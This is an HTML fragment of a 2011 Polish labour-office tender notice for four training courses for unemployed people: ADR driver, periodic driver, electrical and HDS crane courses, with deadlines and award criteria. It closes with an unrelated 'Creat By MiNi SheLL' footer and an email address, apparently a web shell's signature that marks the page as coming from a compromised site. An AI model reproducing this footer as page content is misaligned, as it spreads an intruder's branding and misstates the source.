<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Aleksandrowie Kujawskim
ul. Przemysłowa 1
87 - 700 Aleksandrów Kujawski.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.03.2011 godzina 10:00, miejsce: Powiatowy Urząd Pracy w Aleksandrowie Kujawskim
ul. Przemysłowa 1
87 - 700 Aleksandrów Kujawski
pok. nr 23.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Kurs dokształcający kierowców przewożących materiały niebezpieczne ADR + cysterny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szkoleniem objętych będzie 12 osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Aleksandrowie Kujawskim, skierowanych na szkolenie w jednej grupie, w ramach środków Funduszu Pracy. Rozpoczęcie szkolenia przewidziane jest w II kwartale bieżącego roku..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 11.07.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Posiadanie przez Wykonawcę certyfikatu jakości usług ( np. akredytacja w zakresie przedmiotowego szkolenia, ISO, itp.) - 10</li>
<li>3. Doświadczenie Wykonawcy w realizacji przedmiotowego szkolenia - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Szkolenie okresowe kierowców w zakresie bloków programowych określonych odpowiednio do kategorii prawa jazdy: C1, C1+E, C i C+E.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szkoleniem objętych będzie 20 osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Aleksandrowie Kujawskim, skierowanych na szkolenie w dwóch grupach, skierowanych na szkolenie w ramach środków Funduszu Pracy. Rozpoczęcie szkolenia pierwszej grupy przewidziane jest w II kwartale bieżącego roku, zaś druga grupa rozpocznie szkolenie w III kwartale bieżącego roku..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 13.10.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Posiadanie przez Wykonawcę certyfikatu jakości usług ( np. akredytacja w zakresie przedmiotowego szkolenia, ISO, itp.) - 10</li>
<li>3. Doświadczenie Wykonawcy w realizacji przedmiotowego szkolenia - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Urządzenia, instalacje i sieci elektroenergetyczne o napięciu do 1 kV- eksploatacja.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szkoleniem objętych będzie 10 osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Aleksandrowie Kujawskim, skierowanych na szkolenie w jednej grupie,   w ramach środków Funduszu Pracy.Rozpoczęcie szkolenia przewidziane jest w II kwartale bieżącego roku..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.12.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 11.07.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Posiadanie przez Wykonawcę certyfikatu jakości usług ( np. akredytacja w zakresie przedmiotowego szkolenia, ISO, itp.) - 10</li>
<li>3. Doświadczenie Wykonawcy w realizacji przedmiotowego szkolenia - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Kurs obsługi żurawia przenośnego HDS z uprawnieniami UDT kat. IIŻ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szkoleniem objętych będzie 10 osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Aleksandrowie Kujawskim, skierowanych na szkolenie w jednej grupie, w ramach środków Funduszu Pracy. Rozpoczęcie szkolenia przewidziane jest w II kwartale bieżącego roku..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 11.07.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Posiadanie przez Wykonawcę certyfikatu jakości usług ( np. akredytacja w zakresie przedmiotowego szkolenia, ISO, itp.) - 10</li>
<li>3. Doświadczenie Wykonawcy w realizacji przedmiotowego szkolenia - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com